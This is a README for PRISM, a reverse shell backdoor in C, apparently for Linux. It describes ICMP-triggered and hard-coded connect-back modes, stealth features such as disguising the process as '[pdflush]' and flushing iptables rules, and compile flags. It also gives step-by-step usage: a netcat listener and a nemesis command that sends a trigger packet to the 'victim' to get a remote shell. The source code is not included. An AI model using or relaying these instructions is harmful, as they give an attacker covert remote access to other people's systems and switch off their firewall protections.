PRISM is an user space reverse shell backdoor.
It works in two ways:
ICMP mode
In this mode the backdoor waits silently in background for a specific ICMP packet containing the host/port to connect back and a private key to prevent third party access.
STATIC mode
In this mode the backdoor try to connects to an hard-coded IP/PORT at specifics intervals.
Features:
- Two operating modes (ICMP and STATIC)
- Runtime process renaming
- No listening ports
- Automatic iptables rules flushing
- Written in pure C
- No library dependencies
How to compile:
gcc <..DEFINITIONS..> -Wall -s -o prism prism.c
Available definitions:
-DDETACH #Run process in background -DSTATIC #Enable STATIC mode -DNORENAME #Don't rename process -DIPTABLES #Try to flush all iptables rules
How to use in ICMP mode:
First you need to write the icmp packet payload into a file, for example payload.bin, in the following format:
[SECURITY_KEY] [CLIENT_IP] [CLIENT_PORT]
Now, using netcat, we will wait for incoming connection from the backdoor:
nc -l -p [CLIENT_PORT]
Finally, using nemesis (or another packets builder), we can send the packet to the victim:
nemesis icmp -i 8 -c 0 -D 192.168.0.1 -P payload.bin
At this point the backdoor will connect back to netcat :)
Inf0 option:
$ ./prism Inf0 <-- Zero Version: 0.5 Mode: icmp Key: p455w0rD Process name: [pdflush] Shell: /bin/sh Detach: Yes Flush Iptables: Yes
Download: